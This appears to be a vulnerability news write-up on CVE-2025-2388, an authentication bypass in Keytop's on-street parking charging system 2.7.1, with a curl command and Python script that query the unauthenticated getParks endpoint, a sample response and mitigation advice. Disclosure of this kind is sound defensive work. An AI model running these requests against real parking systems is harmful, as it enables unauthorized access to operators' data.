CVE CyberSecurity Database News

CVE-2025-2388 - Critical Authentication Bypass in Keytop 路内停车收费系统 2.7.1 Exposed

Poster -

---

Introduction

A serious security vulnerability—CVE-2025-2388—has been uncovered in the Keytop 路内停车收费系统 (Keytop On-street Parking Charging System) version 2.7.1. This flaw specifically targets the /saas/commonApi/park/getParks API endpoint, and if exploited, lets attackers bypass authentication controls. In this article, I’ll break down the impact, technical details, example code, exploitation steps, and how to stay protected.

What is Keytop 路内停车收费系统?

Keytop is a widely-used Chinese smart parking system for managing street parking and charging processes in many cities. The system uses web APIs to communicate between parking meters, apps, and backend servers.

Vulnerability Type: Improper Authentication

- Location: /saas/commonApi/park/getParks API endpoint

Impact: Attackers may remotely access backend data without valid login credentials.

- CVSS Score: Critical (9.1/10)

Disclosure: Public exploit is available.

Original Advisory:
- GitHub Advisory
- NVD Record (Pending)

Vulnerability Details

The /saas/commonApi/park/getParks endpoint is meant to be accessed only by authenticated users. However, due to improper authentication checks, any remote actor can access it without session tokens or a login.

Example Exploitation

Below is a step-by-step example showing how an attacker could exploit the bug.

Let’s say you find a Keytop parking management system at

http://example-keytop.com/

Example Request (using curl)

curl -k "http://example-keytop.com/saas/commonApi/park/getParks"

Python Script Example

import requests

target_url = "http://example-keytop.com/saas/commonApi/park/getParks"
response = requests.get(target_url)
print(response.text)

3. Typical Response

{
    "code": ,
    "data": [
        {
            "parkId": "123",
            "parkName": "Downtown Parking Zone",
            "address": "123 Main St",
            ...
        },
        {
            "parkId": "124",
            "parkName": "East Garage",
            ...
        }
    ]
}

Technical Analysis

Root Cause:
The backend does not check or validate any session/cookie/token for the sensitive /getParks API. This allows unauthenticated arbitrary information retrieval.

How to Patch or Mitigate

- VENDOR PATCH: No official patch at the time of writing. Monitor the Keytop website or contact support.

Workaround:

- Restrict public access to /saas/commonApi/park/getParks on firewalls.
- Require authentication (token/session) on all endpoints.

References

- PeiQi Wiki Advisory (Chinese)
- Project Home/Keytop

Conclusion

CVE-2025-2388 is a critical, easy-to-exploit authentication vulnerability affecting Keytop’s street parking backend. Attackers can retrieve sensitive operational data without needing to log in. If you use or operate this system, act now: restrict access and push for a vendor patch.

Timeline

Published on: 03/17/2025 18:15:22 UTC